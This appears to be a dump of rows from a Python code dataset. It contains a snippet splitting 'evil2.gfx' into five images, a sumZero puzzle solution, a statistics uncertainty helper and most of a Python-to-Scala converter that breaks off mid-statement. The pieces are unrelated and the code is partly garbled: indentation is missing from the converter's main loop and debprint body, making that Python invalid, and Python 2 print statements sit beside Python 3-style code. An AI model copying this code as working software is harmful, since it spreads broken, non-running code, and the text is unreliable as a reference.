# so byte k belongs to image k % 5.
# Fix: file handles are now closed deterministically via context managers
# (the originals were opened and never explicitly closed).
with open('evil2.gfx', 'rb') as src:
    im = src.read()
for i in range(0, 5):
    with open('image' + str(i), 'wb') as dst:
        dst.write(im[i::5])
|
12,469 | e751324c7c073ec668f920678217d931cbd748d4 | """
Tag: array, integer
Given an integer n, return any array containing n unique integers
such that they add up to 0.
Example 1: Input: n = 5 Output: [-7,-1,1,3,4]
Explanation: These arrays are also accepted: [-5,-1,1,2,3], [-3,-1,2,-2,4].
Example 2: Input: n = 3 Output: [-1,0,1]
Example 3: Input: n = 1 Output: [0]
Constraints: 1 <= n <= 1000
"""
from typing import List
class Solution:
    def sumZero(self, n: int) -> List[int]:
        """Return n unique integers summing to zero: the n-term arithmetic
        sequence with step 2 centered on zero."""
        return [2 * k - (n - 1) for k in range(n)]
# Module self-tests: pin one concrete valid output per n (these run on import).
assert Solution().sumZero(5) == [-4, -2, 0, 2, 4]
assert Solution().sumZero(3) == [-2, 0, 2]
assert Solution().sumZero(6) == [-5, -3, -1, 1, 3, 5]
print('Tests Passed!!')
|
12,470 | 02da22a179f72654a5f7208ef0dcf2ae4dc6308f | # -*- coding: utf-8 -*-
"""
Created on Mon May 19 21:20:06 2014
@author: Vlad
"""
import numpy as np
import scipy.stats as st
import uncertainties as un
import pint as um
import warnings
DEBUG=False
def ucreate(data,ierr=0.,conf=95.,unit=None):
    """
    Create a ufloat whose uncertainty comes from the requested confidence
    interval of the data, combined (in quadrature) with the instrument's
    own uncertainty.

    Parameters
    ----------
    data: list, tuple or a numpy array
        the data series for which the uncertainty is computed
    ierr: float
        the instrument error at the same confidence level as `conf`;
        default is zero
    conf: float
        the confidence level (in percent) for the uncertainty;
        default=95
    unit: pint.Quantity
        the unit of measure for the created value; default=None.
        NOTE(review): this parameter is accepted but never used in the
        body below - confirm whether pint wrapping was left unfinished.

    Returns
    -------
    out: ufloat or pint.Measurement or pint.Quantity
        a float carrying its uncertainty, or a pint measurement for
        physical quantities

    Notes
    -----
    If data is a float or int, a ufloat with only the instrument error is
    returned; likewise when the series has zero (or NaN) standard deviation.
    A non-numeric `data` raises an exception.
    If unit is not None it must be a pint unit, in which case a
    pint.Measurement is returned (see NOTE above).

    References
    ----------
    [1] R. Tatara and G. Lupia, "Assessing heat exchanger performance data
    using temperature measurement uncertainty," Int. J. Eng. Sci. ..., vol. 3,
    no. 8, pp. 1-12, 2011.
    """
    # Promote RuntimeWarnings (e.g. from the sqrt below) to exceptions.
    warnings.filterwarnings(action='error')
    if isinstance(data,(np.ndarray,list,tuple)):
        dta=np.array(data,dtype='f')
    else:
        if isinstance(data,(float,int)):
            return un.ufloat(data,ierr)
        else:
            raise Exception('valoare numerica')
    xm=np.mean(dta)
    if dta.size>1:
        xstd=np.std(dta,ddof=1)  # sample standard deviation (ddof=1)
    else:
        xstd=0.0
    if xstd==0.0 or np.isnan(xstd):
        # No spread in the data: only the instrument error remains.
        return un.ufloat(xm,ierr)
    xskew=st.skew(dta)
    # Student-t confidence interval for the mean at `conf` percent.
    xint=st.t.interval(conf/100.0,dta.size-1,loc=xm,scale=xstd/np.sqrt(dta.size))
    global DEBUG
    if DEBUG:
        print u'\tmean={:.3f}'.format(xm)
        print u'\tstd={:.3f}'.format(xstd)
        print u'\tskewness={:.3f}'.format(xskew)
        print u'\tstd@95%_min={:.3f}'.format(xm-xint[0])
        print u'\tstd@95%_max={:.3f}'.format(xint[1]-xm)
    # Use the lower half-interval as the statistical uncertainty.
    xstd=xm-xint[0]
    try:
        # Combine instrument and statistical uncertainties in quadrature.
        return un.ufloat(xm,np.sqrt(ierr**2+xstd**2))
    except RuntimeWarning:
        print 'xm=',xm,'ierr=',ierr,'xstd=',xstd
        print 'dta:',dta
def __main():
    """
    Self-test: exercise ucreate() on an array, a list, a tuple and a
    scalar, with DEBUG printing enabled for the duration of the run.
    """
    global DEBUG
    DEBUG = True
    # Single-argument print(...) is valid on both Python 2 (parenthesized
    # print statement) and Python 3 (print function).
    print('running tests....')
    print('ucreate test:')
    print('\tsample array: [1.,1,2,1.5,1.2,1.7,0.9,0.98]')
    x = ucreate(np.array([1., 1, 2, 1.5, 1.2, 1.7, 0.9, 0.98]))
    print(u'\tx={:P}'.format(x))
    print('ucreate test:')
    print('\tsample list: [1.,1,2,1.5,1.2,1.7,0.9,0.98]')
    x = ucreate([1., 1, 2, 1.5, 1.2, 1.7, 0.9, 0.98])
    print(u'\tx={:P}'.format(x))
    print('ucreate test:')
    print('\tsample tuple: (1.,1,2,1.5,1.2,1.7,0.9,0.98)')
    x = ucreate((1., 1, 2, 1.5, 1.2, 1.7, 0.9, 0.98))
    print(u'\tx={:P}'.format(x))
    print('ucreate test:')
    print('\t data o singura valoare,ierr=0.2')
    x = ucreate(2, ierr=0.2)
    print(u'\tx={:P}'.format(x))
    print('ucreate test:')
    print('\t list [3.,3,3,3,3,3,3,3],ierr=0.2')
    x = ucreate([3., 3, 3, 3, 3, 3, 3, 3], ierr=0.2)
    print(u'\tx={:P}'.format(x))
    DEBUG = False

if __name__ == '__main__':
    __main()
|
12,471 | 48d3304efdaaea4cf98650b8b87c029d3d62026d | #!/usr/bin/python
# Copyright (C) 2011 Ben Wing <ben@benwing.com>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of Ben Wing may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import sys
import fileinput
import optparse
###########################################################################
#
# Comments
#
###########################################################################
## General FIXME's for this program:
## -- BUGBUG: In multiline def() with --remove-self, we change 'self' to
## 'this' but then don't remove 'this'. Works OK with single-line def().
## -- Converting this program to use a proper parser would make some
## conversions easier (e.g. $1 in $2 -> $2 contains $1), and might simplify
## some of the multiline handling.
## -- In variable snarfing/fixing-up (e.g. adding var/val), should:
## 1. Handle cases like (foo, bar) = ..., adding val and noting both
## variables so we handle later cases where either var is modified
## 2. Handle cases like foo, bar = ..., similarly, but MUST add parens
## around the variables, i.e. convert to 'val (foo, bar) = ...'
## 3. Handle cases like val/var (foo, bar) = ..., handling similarly,
## but with the same changes we make whenever we've already seen
## val/var.
## 4. Handle cases like val/var foo, bar = ..., which are equivalent
## to assigning both foo and bar the entire RHS.
## 5. (Different subject) Variable declarations introduced inside of
## braces will scope only to those braces. If we see a val/var,
## add it but also note the current indent, so that when popping past
## that indent level we remove those items. If we see an assignment
## to new variable and have to add our own val/var, we need to keep
## in mind that just adding val/var to the same line will cause the
## var to have the scope of the enclosing brace. So we need to
## track both assignments and references to variables, and if we see
## either, issue a warning indicating that the code will have to be
## fixed up manually. (Moving it out automatically is too tricky for
## what we're doing here.)
## -- Handle XML literals properly in Scala code.
###########################################################################
#
# Command-line options and usage
#
###########################################################################
# Help text shown by optparse; %prog is replaced with the program name.
usage = """%prog [OPTIONS] [FILE]
Convert a Python file to Scala.
Conversion is not perfect, and it is completely expected that further
manual editing is required.  The idea is to take care of the most common
conversions necessary, especially the ones (like adding braces) that are
difficult to do with a simple search/replace.
An important property of this program is that it is (largely) idempotent,
i.e. if you run it on code that has previously been converted, it should
do nothing, and if run on partially converted code it should only convert
the remainder.  This is useful for various reasons.  One of them has to
do with conversions like removing `self.' or changing bracketed array
references to parens that remove useful info.  Eventually we want to make
these changes, but before then we may find the unchanged code useful for
e.g. redoing class constructors (which are done in a completely different
fashion in Python and Scala, and basically need to be converted manually)
and adding type annotations to functions (again something to do manually).
Thus, the program is intended to work as follows:
1. Run it to do a preliminary conversion
2. Fix up class constructors, add type annotations
3. Run it again with the -2 (or --second-pass) option to fix up self
references and brackets, and not do other changes that might mess up
previously Scala-fied code (e.g. changing None to null, since None also
has a meaning in Scala).
Currently, parsing is done with regexps rather than context-free.  This means
that some constructions may not be converted perfectly.  However, strings
of various sorts (including multiline strings) are usually handled properly;
likewise multiline block openers and such.  However, embedded XML is NOT
currently handled properly -- or at least, unquoted raw text will get frobbed
instead of ignored.  You might want to use the PY2SCALA directives to get
around this (see below).
If the conversion process messes up and changes something that you don't
want changed, you can override this using a directive something like this:
// !!PY2SCALA: <directive>
or like this:
# !!PY2SCALA: <directive>
where <directive> is currently either BEGIN_PASSTHRU (start passing lines
through without trying to frob them) or END_PASSTHRU (end doing this).  Note
that the comment sign at the begin is not part of the directive, but simply
a way of embedding the directive in code.  Likewise the <> signs do not
appear in the directive command, which uses only uppercase letters, the
underscore character, and possibly numbers.  Such a directive will be
recognized anywhere on a line, regardless of what comes before or after --
that way, it can be embedded in a comment or whatever.  However, it will only
be recognized if it has exactly the opening tag "!!PY2SCALA: " followed by a
directive command, and only if the command is one of the recognized ones.
That way it's highly unlikely such a directive would appear by accident.
"""
parser = optparse.OptionParser(usage=usage)
parser.add_option("-s", "--scala", action="store_true",
    help="""If true, code is already Scala-fied, so don't do
conversions that might negatively affect Scala code.""")
parser.add_option("-r", "--remove-self", "--rs", action="store_true",
    help="""Remove self.* references and self params.
Also removes cls.* references and cls params.  Not done by default because
it removes info necessary for manually converting classes (especially
constructors) and separating class methods into companion objects.  Useful
to rerun this program with this option after these things have been done.""")
parser.add_option("-b", "--convert-brackets", "--cb", action="store_true",
    help="""Try to convert array refs like foo[i] to Scala-style foo(i).
Not done by default because it removes info useful for adding type annotations
to functions.  Useful to rerun this program with this option after doing
this.  You will still have to convert slices by hand.  This attempts not
to convert bracket references that are meaningful to Scala (i.e. generic
type parameters) using the assumption that types in Scala begin with an
uppercase letter.""")
parser.add_option("-2", "--second-pass", action="store_true",
    help="""Equivalent to -srb. Used when doing a second pass through already Scala-fied code to remove self.* references and convert brackets to parens for array refs.""")
(options, args) = parser.parse_args()
# -2 is shorthand for enabling all three second-pass conversions at once.
if options.second_pass:
  options.scala = True
  options.remove_self = True
  options.convert_brackets = True
## Process file(s)
def uniprint(text, outfile=sys.stdout, nonl=False, flush=False):
  '''Print a text string, converting Unicode as necessary.

  On Python 2, a unicode string is encoded to UTF-8 first so it can be
  written without errors.  Output goes to OUTFILE (default stdout).  A
  trailing newline is written unless NONL is true.  Output is not normally
  flushed (unless the stream does this automatically), but this can be
  forced with FLUSH.

  Uses outfile.write() rather than the Python-2-only "print >>" statement,
  so the function works on both Python 2 and Python 3.  (NONL no longer
  produces Python 2's lazy "softspace" separator; it simply omits the
  newline.)
  '''
  # `str is bytes` is True only on Python 2; `and` short-circuits, so the
  # py2-only `unicode` builtin is never evaluated on Python 3.
  if str is bytes and isinstance(text, unicode):
    text = text.encode("utf-8")
  outfile.write(text)
  if not nonl:
    outfile.write("\n")
  if flush:
    outfile.flush()
def errprint(text, nonl=False):
  '''Print TEXT to stderr, converting Unicode as necessary.

  Thin wrapper around uniprint() with the output stream fixed to stderr;
  NONL suppresses the trailing newline, as in uniprint().'''
  uniprint(text, sys.stderr, nonl)
# A hackish function for print-debugging.
def debprint(fmt, *vals):
errprint("Debug: Line %d, %s" % (lineno, fmt % vals))
# RE's for balanced expressions.  This is a major hack.  We only use this
# for things like converting '$1 in $2' to '$2 contains $1'.  In general,
# we count parens and brackets properly.
# One level of nesting: a paren/bracket group containing no further
# brackets of either kind.
balparenexpr = r'\([^()]*\)'
balbracketexpr = r'\[[^\[\]]*\]'
# Text containing at most level-1 groups.
balstr0 = r'(?:[^()\[\]]|%s|%s)*' % (balparenexpr, balbracketexpr)
# Two levels of nesting.
bal2parenexpr = r'\(%s\)' % balstr0
bal2bracketexpr = r'\[%s\]' % balstr0
# Possibly-empty (…0) and non-empty text with up to two levels of nesting;
# the "nospace" variants additionally exclude spaces at the top level.
bal2str0 = r'(?:[^()\[\]]|%s|%s)*' % (bal2parenexpr, bal2bracketexpr)
bal2strnospace0 = r'(?:[^ ()\[\]]|%s|%s)*' % (bal2parenexpr, bal2bracketexpr)
bal2str = r'(?:[^()\[\]]|%s|%s)+' % (bal2parenexpr, bal2bracketexpr)
bal2strnospace = r'(?:[^ ()\[\]]|%s|%s)+' % (bal2parenexpr, bal2bracketexpr)
# Comment syntax depends on whether the input is (partially) Scala-fied;
# this alternation is spliced into stringre below.
if options.scala:
  commentre = r''' | /\* .*? \*/ # C-style Scala comment
 | /\* .* # C-style Scala comment unmatched (multi-line)
 | //.* # C++-style Scala comment
'''
else:
  commentre = r''' | [#].*''' # Python comment
# RE to split off quoted strings and comments.
# FIXME: The handling of backslashes in raw strings is slightly wrong;
# I think we only want to look for a backslashed quote of the right type.
# (Or maybe we look for no backslashes at all?)
# FIXME: We don't handle XML literals at all
# Compiled with re.X, so embedded whitespace is insignificant and # starts
# an in-pattern comment.  ('[']' matches a single quote via a char class,
# so three in a row match a triple-single-quote.)
stringre = re.compile(r'''( r?'[']' .*? '[']' # 3-single-quoted string
 | r?""" .*? """ # 3-double-quoted string
 | r?'[']'.* # unmatched 3-single-quote
 | r?""".* # unmatched 3-double-quote
 | r?' (?:\\.|[^'])* ' # single-quoted string
 | r?" (?:\\.|[^"])* " # double-quoted string
 | r?'.* # unmatched single-quote
 | r?".* # unmatched double-quote
 %s
 )''' % commentre, re.X)
# Test function for above RE. Not called.
# Test function for the stringre RE above.  Not called.
def teststr(x):
  """Split X with stringre and print each resulting piece on its own line.

  Interactive debugging aid only.  Uses print(...) with a single argument,
  which is valid on both Python 2 (parenthesized print statement) and
  Python 3 (print function) -- the original `print y` statement was
  Python-2-only syntax.
  """
  for piece in stringre.split(x):
    print(piece)
# List of multi-line delimiters (quotes, comments).  Each entry is a tuple
# of (start, end) -- this handles comments like /* ... */ properly.
multi_line_delims = [('"""', '"""'), ("'''", "'''")]
if options.scala:
  # Scala-fied input may also contain C-style block comments.
  multi_line_delims += [('/*', '*/')]
# Single-character quote delimiters recognized on one line.
single_quote_delims = ['"', "'"]
# If we added a triple-quote delimiter, remove it. (We add such delimiters
# to the beginning of a line if we're in the middle of a multi-line quote,
# so our string-handling works right.)
def line_no_added_delim(line, delim):
  """Strip DELIM from the front of LINE, if DELIM is non-empty.

  We prepend a triple-quote delimiter to lines that continue a multi-line
  quote so string parsing works; this undoes that addition.  Asserts that
  LINE really starts with DELIM.
  """
  if not delim:
    return line
  assert line.startswith(delim)
  return line[len(delim):]
# Add a "virtual line", possibly spanning multiple lines, to the line list
def add_bigline(bigline):
  # Append a "virtual line" (which may contain embedded newlines) to the
  # global lines[] list, one physical line per element.  None is a no-op.
  global lines
  if bigline is None:
    return
  lines.extend(bigline.split('\n'))
# Main function to frob the inside of a line. Passed a line split by
# stringre.split() into alternating text and delimiters composed of
# quoted strings and/or comments. This is a generator function that
# returns values with `yield'.
def modline(split):
  '''Frob the pieces of one line and yield the converted pieces.

  SPLIT is a line split by stringre.split() into alternating plain text
  (even indices) and delimiters -- quoted strings or comments -- (odd
  indices).  This is a generator: it yields each piece, converted, in
  order, so that ''.join(modline(split)) rebuilds the converted line.
  Reads module globals `options` and `old_openquote`, and updates the
  global `openquote` when a multi-line quote opens or closes.
  '''
  for i in xrange(len(split)):
    prev = None
    if i > 0:
      prev = split[i-1]
    vv = split[i]
    #debprint("Saw #%d: %s", i, vv)
    # Skip blank sections (e.g. at end of line after a comment)
    if len(vv) == 0:
      yield vv
      continue
    # If we're handling a string composed from the added delimiter,
    # don't try to frob it.
    nofrob = old_openquote and i == 1 and prev == ""
    if i % 2 == 1: # We are looking at a delimiter
      # Look for raw-string prefix on strings
      vv2 = vv
      # raw will be None if no quote of any sort here, 'r' if a raw Python
      # string, '' if non-raw string
      raw = None
      if vv[0] == 'r' and len(vv) > 1 and vv[1] in single_quote_delims:
        vv2 = vv[1:]
        raw = "r"
      elif vv[0] in single_quote_delims:
        raw = ""
      # Look for (unclosed) multi-line quote or comment
      saw_multiline_delim = False
      unclosed = False
      global openquote
      for delim in multi_line_delims:
        (delimstart, delimend) = delim
        if vv2.startswith(delimstart):
          #debprint("Saw multi-line delim %s", delimstart)
          saw_multiline_delim = True
          if vv2 == delimstart or not vv2.endswith(delimend):
            openquote = delimstart
            unclosed = True
      if saw_multiline_delim and not unclosed:
        openquote = None
      if raw is not None: # We're handline some sort of string, frob it
        if saw_multiline_delim:
          # FIXME!! Python has eight types of strings: Single and triple
          # quoted strings, using both single and double quotes (i.e.
          # ', ", ''', """), as well as the "raw" variants prefixed with r.
          # Scala has only two types: Strings quoted like "foo", and
          # raw multiline strings quoted like """foo""".  We're not properly
          # shoehorning the various types of Python strings into Scala
          # strings.  The only thing we do is try to convert Python strings
          # like r"foo" and r'foo' into Scala raw """foo""" strings.
          #
          # Note that Scala also has single-character literals like 'f',
          # whereas Python uses normal strings for this.  We try to do the
          # right thing here (i.e. leave 'f' as 'f' but convert 'ff' to "ff"),
          # but we can't be perfect because (a) we don't know whether a
          # single-character Python string should become a Scala string or
          # character literal, and (b) since we can be run more than once,
          # we can't distinguish "f" as a Scala single-character string
          # (should be left alone) from "f" as a Python single-character
          # string (potentially convertible to Scala 'f').
          if vv2.startswith("'''") and not nofrob:
            if unclosed:
              yield raw + '"""' + vv2[3:]
            else:
              yield raw + '"""' + vv2[3:-3] + '"""'
          else:
            yield vv
          continue
        for delim in single_quote_delims:
          if (vv2.startswith(delim) and
              (vv2 == delim or not vv2.endswith(delim))):
            warning("Saw unfinished single quoted string %s" % vv)
            yield vv
            # NOTE(review): this 'continue' restarts the inner 'for delim'
            # loop, not the outer token loop, so the piece can be yielded
            # a second time by the code below -- looks like a latent bug;
            # confirm intent.
            continue
        revisedstr = vv2
        if vv2.startswith("'") and (
            (len(vv2) != 4 if not raw and vv2[1] == '\\' else len(vv2) != 3)
            ):
          # Single-quoted string of length != 1
          # Convert to double-quoted string
          revisedstr = '"' + vv2[1:-1] + '"'
          # FIXME! This may fail with unbackslashed quotes of the other
          # sort in the string.  See comments above about the eight types of
          # Python strings.
        if raw:
          yield '""' + revisedstr + '""'
        else:
          yield revisedstr
        continue
        # We don't convert in the opposite direction because in Scala
        # someone might reasonably have a double-quoted string of length 1
      # Convert comments
      if vv.startswith('#'):
        yield '//' + vv[1:]
        continue
      yield vv
    else:
      # Not a delimiter: plain code text -- apply keyword and operator
      # conversions.
      vv = re.sub(r'\bor\b', '||', vv)
      vv = re.sub(r'\band\b', '&&', vv)
      vv = re.sub(r'\bTrue\b', 'true', vv)
      vv = re.sub(r'\bFalse\b', 'false', vv)
      # some None in Scala code should actually be None (e.g. when
      # Option[T] is used)
      if not options.scala:
        vv = re.sub(r'\bNone\b', 'null', vv)
      vv = re.sub(r'\bnot ', '!', vv)
      vv = re.sub(r'\bis (None|null)\b', '== null', vv)
      vv = re.sub(r'\bis !.*(None|null)\b', '!= null', vv)
      vv = re.sub(r'lambda ([A-Za-z0-9]+): ?', r'\1 => ', vv)
      # Seems this isn't necessary; (for x <- y if foo) works fine in Scala
      #vv = re.sub(r'[\[(](.*) for (.*) in (.*) if (.*)[)\]]',
      #    r'(for (\2 <- \3; if \4) yield \1)', vv)
      vv = re.sub(r'[\[(](%s) for (.*) in (%s)[)\]]' % (bal2str, bal2str),
          r'(for (\2 <- \3) yield \1)', vv)
      if not re.match(r'.*\bfor\b', vv):
        vv = re.sub(r'(%s) in (%s)\b' % (bal2strnospace, bal2strnospace),
            r'\2 contains \1', vv)
      vv = re.sub(r'len\((%s)\)' % bal2str, r'\1.length', vv)
      vv = re.sub(r'\bpass\b', '()', vv)
      # change % to format but only when applied to string
      if prev and prev[0] in single_quote_delims:
        vv = re.sub(r'^( +)%( +)', r'\1format\2', vv)
      if options.remove_self:
        vv = re.sub(r'\bself\.', '', vv)
        vv = re.sub(r'\bself\b', 'this', vv)
        vv = re.sub(r'\bcls\.', '', vv)
        # Not sure about this
        #vv = re.sub(r'\bcls\b', 'this', vv)
      if options.convert_brackets:
        # Convert bracketed expressions, but avoid list constructors
        # (previous character not alphanumeric) and scala generic vars/types
        # (the type in brackets is usually uppercase)
        vv = re.sub(r'([A-Za-z0-9_])\[([^A-Z\]]%s)\]' % bal2str0,
            r'\1(\2)', vv)
      yield vv
# --- Mutable parser state shared by the main loop and the helpers above ---
# Indentation of current or latest line
curindent = 0
# If not None, a continuation line (line ending in backslash)
contline = None
# Status of any unclosed multi-line quotes (''' or """) or multi-line comments
# at end of line
openquote = None
# Same, but for the beginning of the line
old_openquote = None
# Mismatch in parens/brackets so far at end of line (includes mismatch from
# previous lines, so that a value of 0 means we are at the end of a logical
# line)
paren_mismatch = 0
# Same, but for the beginning of the line
old_paren_mismatch = 0
# Indent last time paren mismatch was zero
zero_mismatch_indent = 0
# Source line number last time paren mismatch was zero
zero_mismatch_lineno = 0
# Blank/comment count last time paren mismatch was zero
zero_mismatch_prev_blank_or_comment_line_count = 0
# Accumulation of line across paren mismatches and multi-line quotes.
# This will hold the concatenation of all such lines, so that we can
# properly handle multi-line if/def/etc. statements and variable assignments.
bigline = None
# Accumulation of unfrobbed line across paren mismatches
old_bigline = None
# Lineno and indent at start of bigline
bigline_indent = 0
bigline_lineno = 0
# Current source line number.  Not the same as a "line index", which is an
# index into the lines[] array.  (Not even simply off by 1, because we
# add extra lines consisting of braces, and do other such changes.)
lineno = 0
# Lines accumulated so far.  We need to be able to go back and modify old
# lines sometimes.  Note that len(lines) is the "line index" of the
# current line being processed, at least after we handle dedentation
# (where we might be inserting lines).
lines = []
# Number of blank or comment-only lines just seen
blank_or_comment_line_count = 0
# Same, not considering current line
prev_blank_or_comment_line_count = 0
# Whether we are ignoring lines due to PY2SCALA directive
in_ignore_lines = False
# Store information associated with an indentation block (e.g. an
# if/def statement); stored into indents[]
class Indent:
  """One active indentation block (e.g. the body of an if/def statement).

  startind -- line index of the start of the block-opening statement
  endind   -- line index of the end of the block-opening statement
  indent   -- indentation column of the block-opening statement
  ty       -- "python" or "scala"
  """
  def __init__(self, startind, endind, indent, ty):
    self.startind, self.endind = startind, endind
    self.indent, self.ty = indent, ty

  def adjust_lineinds(self, at, by):
    """Shift stored line indices at or beyond AT upward by BY."""
    if self.startind >= at:
      self.startind += by
    if self.endind >= at:
      self.endind += by
# Store information associated with a class or function definition;
# stored into defs[]
class Define:
  """One active class or function definition.

  ty: "class" or "def"
  name: name of class or def
  vardict: dict of currently active params and local vars.  The key is
    a variable name and the value is one of "val" (unsettable function
    parameter), "var" (settable function parameter), "explicit"
    (variable declared with an explicit var/val) or a line number
    (bare variable assignment; the line number is so that we can change
    an added 'val' to 'var' if necessary).
  """
  def __init__(self, ty, name, vardict):
    self.ty = ty
    self.name = name
    self.vardict = vardict
    # Captured from the module globals describing the statement currently
    # being parsed.
    self.lineno = bigline_lineno
    self.indent = bigline_indent
    self.lineind = len(lines)
    # Line index of insertion point in companion object
    self.compobj_lineind = None

  # Adjust line indices starting at AT up by BY.
  def adjust_lineinds(self, at, by):
    #debprint("Adjusting lines at %s by %s", at, by)
    if self.lineind >= at: self.lineind += by
    if self.compobj_lineind and self.compobj_lineind >= at: self.compobj_lineind += by
    # .items() works on both Python 2 and 3; the original .iteritems() is
    # Python-2-only.  Only integer values (bare-assignment line numbers)
    # are shifted; values are mutated in place, which is safe during
    # iteration since no keys are added or removed.
    for (k, v) in self.vardict.items():
      if type(v) is int and v >= at: self.vardict[k] += by
    #debprint("Finishing adjusting lines at %s by %s, len(lines)=%s", at, by,
    # len(lines))
    #for (k, v) in self.vardict.items():
    # debprint("name=%s, vardict[%s] = %s", self.name, k, v)
# List of currently active indentation blocks, of Indent objects
# Currently active indentation blocks (Indent objects).
indents = []
# Currently active function/class definitions (Define objects).
defs = []

def adjust_lineinds(at, by):
  """Shift line indices >= AT upward by BY in every active Define and
  Indent record.  Used when inserting or deleting lines from lines[]."""
  for tracker in defs + indents:
    tracker.adjust_lineinds(at, by)
# Output a warning for the user.
def warning(text, nonl=False):
  '''Like errprint() but prefixes "Warning: " and the current source line
  number to the message.'''
  tagged = "Warning: %d: %s" % (lineno, text)
  errprint(tagged, nonl=nonl)
################# Main loop
# Loop over all lines in stdin or argument(s)
for line in fileinput.input(args):
lineno += 1
# Remove LF or CRLF, convert tabs to spaces
line = line.rstrip("\r\n").expandtabs()
#debprint("Saw line: %s", line)
# If previous line was continued, add it to this line
if contline:
# This is OK because we checked to make sure continuation was not in
# a quote or comment
line = contline.rstrip() + " " + line.lstrip()
contline = None
m = re.match('.*!!PY2SCALA: ([A-Z_]+)', line)
if m:
directive = m.group(1)
if directive == 'BEGIN_PASSTHRU':
in_ignore_lines = True
lines += [line]
continue
elif directive == 'END_PASSTHRU':
in_ignore_lines = False
lines += [line]
continue
if in_ignore_lines:
lines += [line]
continue
# If we are continuing a multiline quote, add the delimiter to the
# beginning. That way we will parse the line correctly. We remove
# the delimiter at the bottom.
if openquote:
line = openquote + line
# Split the line based on quoted and commented sections
#debprint("Line before splitting: [%s]", line)
splitline = list(stringre.split(line))
# If line is continued, don't do anything yet (till we get the whole line)
lasttext = splitline[-1]
if lasttext and lasttext[-1] == '\\':
contline = line_no_added_delim(line, openquote)[0:-1]
continue
# Look for blank or comment-only lines
blankline = re.match(r'^ *$', line)
if re.match('^ *(#.*|//.*)?$', line):
blank_or_comment_line_count += 1
else:
prev_blank_or_comment_line_count = blank_or_comment_line_count
blank_or_comment_line_count = 0
# Record original line, and values of paren_mismatch and openquote
# at start of line
old_paren_mismatch = paren_mismatch
oldline = line
old_openquote = openquote
# Count # of mismatched parens (also brackets)
for i in xrange(len(splitline)):
vv = splitline[i]
if i % 2 == 0: # Make sure not a quoted string or comment
# Count mismatch of parens and brackets. We don't do braces because
# we might be processing Scala-like code.
paren_mismatch += vv.count('(') + vv.count('[') - \
vv.count(')') - vv.count(']')
#debprint("Line %d, old paren mismatch %d, new paren mismatch %d",
# lineno, old_paren_mismatch, paren_mismatch)
if paren_mismatch < 0:
warning("Apparent unmatched right-paren, we might be confused: %s" % line)
paren_mismatch = 0
# Compute current indentation, handle dedenting (may need to insert braces).
# Note that blank lines don't have any effect on indentation in Python,
# and nor do continued multi-line quotes.
if not old_openquote and not blankline:
# Get current indentation
m = re.match('( *)', line)
indent = len(m.group(1))
# Handle dedent: End any blocks as appropriate, and add braces
if indent < curindent:
# Pop off all indentation blocks at or more indented than current
# position, and add right braces
while indents and indents[-1].indent >= indent:
indobj = indents.pop()
# Can happen, e.g., if // is used in Python to mean "integer division",
# or other circumstances where we got confused
if old_paren_mismatch > 0:
warning("Apparent unmatched left-paren somewhere before, possibly line %d, we might be confused" % zero_mismatch_lineno)
# Reset to only mismatched left parens on this line
paren_mismatch = paren_mismatch - old_paren_mismatch
if paren_mismatch < 0:
paren_mismatch = 0
if indobj.ty == "scala":
continue
rbrace = "%s}" % (' '*indobj.indent)
# Check for right brace already present; if so, just make sure
# corresponding left brace is present
if line.startswith(rbrace):
lines[indobj.endind] += " {"
else:
insertpos = len(lines)
# Insert the right brace *before* any blank lines (we skipped over
# them since they don't affect indentation)
while re.match('^ *$', lines[insertpos - 1]):
insertpos -= 1
# If the "block" is only a single line, and it's not introduced
# by "def" or "class", don't add braces.
# We check for 2 because with a single-line block, the potential
# right-brace insertion point is 2 lines past the opening block
# (1 for opening line itself, 1 for block)
#debprint("lineno:%s, startind:%s, endind:%s, lines:%s",
# lineno, indobj.startind,
# indobj.endind, len(lines))
if (insertpos - indobj.endind > 2 or
re.match('^ *(def|class) ', lines[indobj.startind])):
lines[indobj.endind] += " {"
lines[insertpos:insertpos] = [rbrace]
# Pop off all function definitions that have been closed
while defs and defs[-1].indent >= indent:
defs.pop()
# Set indentation value for current line
curindent = indent
# Record some values if no paren mismatch or continued quote at start of line
if not old_openquote and old_paren_mismatch == 0:
zero_mismatch_indent = curindent
zero_mismatch_lineno = lineno
zero_mismatch_prev_blank_or_comment_line_count = prev_blank_or_comment_line_count
########## Now we modify the line itself
# Frob the line in various ways (e.g. change 'and' to '&&')
line = ''.join(modline(splitline))
# Accumulate a logical line into 'bigline' across unmatched parens and quotes
line_without_delim = line_no_added_delim(line, old_openquote)
old_line_without_delim = line_no_added_delim(oldline, old_openquote)
if old_paren_mismatch == 0 and not old_openquote:
assert bigline == None
bigline = line_without_delim
old_bigline = old_line_without_delim
bigline_indent = curindent
bigline_lineno = lineno
assert bigline_indent == zero_mismatch_indent
assert bigline_lineno == zero_mismatch_lineno
else:
bigline = bigline + "\n" + line_without_delim
old_bigline = old_bigline + "\n" + old_line_without_delim
# If we see a Scala-style opening block, just note it; important for
# unmatched-paren handling above (in particular where we reset the
# unmatched-paren count at the beginning of a block, to deal with
# errors in parsing)
if paren_mismatch == 0 and not openquote and (
re.match(r'.*\{ *$', splitline[-1])):
